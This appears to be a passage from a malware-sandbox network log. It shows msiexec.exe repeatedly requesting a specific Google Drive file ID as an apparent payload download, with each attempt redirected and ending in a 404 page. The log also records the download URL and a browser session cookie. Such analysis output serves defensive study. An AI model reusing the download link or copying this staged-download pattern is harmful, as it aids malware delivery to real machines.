                                                                    2025-01-11 02:08:51 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 62 53 39 49 68 62 4c 32 67 6f 6f 56 58 5a 4f 33 76 46 37 68 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zbS9IhbL2gooVXZO3vF7hQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.649987216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:08:52 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:08:52 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:08:52 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy: script-src 'nonce-QqxIjWH9XMymgy_B2xuPUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.649988142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:08:53 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:08:53 UTC1844INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgS4ryeFUyhwFjuOpt6QYUDgjoJi2VBccicqu5ufWYumIdgroJUCSj8mM19r44ZVx4k1
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:08:53 GMT
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-U86fOgIHl5pQjiCls8rkPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:08:53 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 32 6d 73 6b 4b 45 7a 34 45 6d 37 37 39 33 36 45 6c 6a 69 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="p2mskKEz4Em77936Eljidw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.649989216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:08:54 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:08:54 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:08:54 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-CYulXXDBulyetM2g8KyAyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.649990142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:08:55 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:08:56 UTC1851INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgRqF2IYrqX7cDZUoXqxfCyMv2WOiCJjvTb1rg5ymgcQsaObGM9uFj1TbuhxWhkX98EfD04dlYQ
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:08:55 GMT
                                                                    Content-Security-Policy: script-src 'nonce-mXOwVsDROoX8Z-deesKbMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:08:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 41 34 38 35 65 74 59 74 49 73 78 38 43 39 37 50 63 64 75 77 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uA485etYtIsx8C97PcduwA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.649991216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:08:56 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:08:57 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:08:57 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-IMqCZIBk4vtxpUhXsqq82w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.649992142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:08:57 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:08:58 UTC1844INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFiumC6O_xi4eK0zYRESZytb29lZeZvY-qdXFCl6Zq1OlDyhx41r-2L-gopBxSuPSfk-5Bhk
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:08:58 GMT
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-GQ0bSoF1BR3qls8a4lx-lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2025-01-11 02:08:58 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 57 51 62 41 69 7a 2d 47 45 4c 41 41 4b 62 6f 4d 78 4a 68 78 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8WQbAiz-GELAAKboMxJhxw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.649993216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:08:59 UTC417OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:08:59 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:08:59 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-QotTisZVhqpa2ZEN0AerSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.649994142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:09:00 UTC459OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
                                                                    2025-01-11 02:09:00 UTC1844INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFiumC750KnAA9VlVDqhnFQF1NlRG2LXgwFCaiEhIttJscnGJYEfwbhNr-GcmZJ3LPXyqtCI
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
